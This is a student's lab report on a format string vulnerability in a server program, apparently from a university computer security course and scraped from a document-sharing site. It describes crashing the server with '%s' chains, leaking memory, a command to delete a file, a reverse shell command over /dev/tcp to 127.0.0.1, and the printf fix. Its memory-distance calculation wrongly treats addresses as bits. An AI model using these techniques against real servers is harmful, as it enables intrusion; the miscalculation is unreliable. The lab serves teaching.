Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
80 views4 pages

CPS633 Lab3 PDF

The document outlines a lab on format string vulnerabilities in a server program, detailing tasks that include identifying memory addresses, crashing the program, and injecting malicious code. It explains how to exploit the vulnerability to gain a reverse shell and provides a solution to fix the vulnerability by modifying the printf function. The lab emphasizes the importance of proper input formatting to prevent security issues.

Uploaded by

huynguyenquoc2703
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
80 views4 pages

CPS633 Lab3 PDF

The document outlines a lab on format string vulnerabilities in a server program, detailing tasks that include identifying memory addresses, crashing the program, and injecting malicious code. It explains how to exploit the vulnerability to gain a reverse shell and provides a solution to fix the vulnerability by modifying the printf function. The lab emphasizes the importance of proper input formatting to prevent security issues.

Uploaded by

huynguyenquoc2703
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

CPS 633 Computer Security

Format String Vulnerability Lab


Lab 3
Justin Miraflor - 500908894 Section 3
Ryan Rodrigues - 500915227 Section 1
The DUMMY_SIZE value for this lab is: 150

2.1 Task1: The Vulnerable Program


When compiling the server.c program, the following warning message appears as mentioned in
the lab:

When running the program under root privileges, we get the following output:

When sending a “hello” message to the server using the nc command, we get the following:

This study source was downloaded by 100000885095184 from CourseHero.com on 05-01-2025 17:59:39 GMT -05:00

https://www.coursehero.com/file/113545824/CPS633-Lab3pdf/
Sending the content of badfile to the server using the nc command:

2.2 Task 2: Understanding the Layout of the Stack


Question 1: What are the memory addresses at the locations marked by 1, 2 and 3?
1. Format string address = “target” variable after = 0x0804a044
2. Return address = ebp value = 0xbfd27ee8
3. buf[1500] = input array = 0xbfd27fc0
Question 2: What is the distance between the locations marked by 1 and 3?
Memory address of 1 is 0x0804a044 = 134,520,900
Memory address of 3 is 0xbfd27fc0 = 3,218,243,520 bits

3,218,243,520 - 134,520,900 = 3,083,722,620 bits


3,083,722,620 bits = 385,465,328 bytes of memory

385,465,328 bytes of memory is the distance between 1 and 3.

2.3 Task 3: Crash the Program


To crash the program, the input that we would need to type when running “server” would be
“%s%s%s%s%s%s%s%s”

This study source was downloaded by 100000885095184 from CourseHero.com on 05-01-2025 17:59:39 GMT -05:00

https://www.coursehero.com/file/113545824/CPS633-Lab3pdf/
2.4 Task 4: Print Out the Server Program’s Memory
Part A: Stack Data

The number of specifiers that we needed to provide so that the server program were to print the
first four bytes of our input “%x” is 50.

Part B: Heap Data


Since the address of the secret message is 0x08048880 we can use this to find the content of
the secret message which is the value “0000000000000096”

2.5 Task 5: Change the Server Program’s Memory


Part .A: Change the value to a different value

2.6 Task 6: Inject Malicious Code into the Server Program


In order for the python program to remove the target file we would need to use format string
vulnerability to modify the return address and need to feed the server program the memory
address of the malicious python code (server_exploit_skeleton.py). This is so the stack can run
/bin/bash -c "/bin/rm /tmp/myfile" in the server terminal. The way that the format string would be
constructed is by including the memory address of the malicious code so that when the function
returns after the call, it will run the malicious code.

This study source was downloaded by 100000885095184 from CourseHero.com on 05-01-2025 17:59:39 GMT -05:00

https://www.coursehero.com/file/113545824/CPS633-Lab3pdf/
2.7 Task 7: Getting a Reverse Shell
Within the python code given (server_exploit_skeleton.py), the changes that were made are
shown below:
“x68””<&1 2>&1”
“x68””//7070 0”
“x68””///127.0.0.1”
“x68””/dev/tcp”
“x68”” -iii > “
“x68””/bin////bash“
From Lines 1 and 2 in the code, we changed its values on the stack so we can run the
command "/bin/bash -i > /dev/tcp/127.0.0.1/7070 0<&1 2>&1" . The format string in this task is
also constructed by finding and implementing the memory address of the code and sending it to
the server program. If the attack of this server is successful, we will gain access to the root shell
of the victim’s computer.

2.8 Task 8: Fixing the Problem


The warning message that is generated by the gcc compilers means that the compiler can’t
recognize the arguments given to “printf” until run-time. In a way, the compiler is also telling us
that we should be more specific to what we want the function “printf” to accept as it may lead to
possible issues when running the program.

To fix the vulnerability in the program we switch the following line of code “printf(msg);” to
“printf(“%s”, msg);”. Now the program compiles without any warnings because we have told the
compiler how to format the input strings correctly.

When trying the same attacks as before they no longer work:

This study source was downloaded by 100000885095184 from CourseHero.com on 05-01-2025 17:59:39 GMT -05:00

https://www.coursehero.com/file/113545824/CPS633-Lab3pdf/
Powered by TCPDF (www.tcpdf.org)

You might also like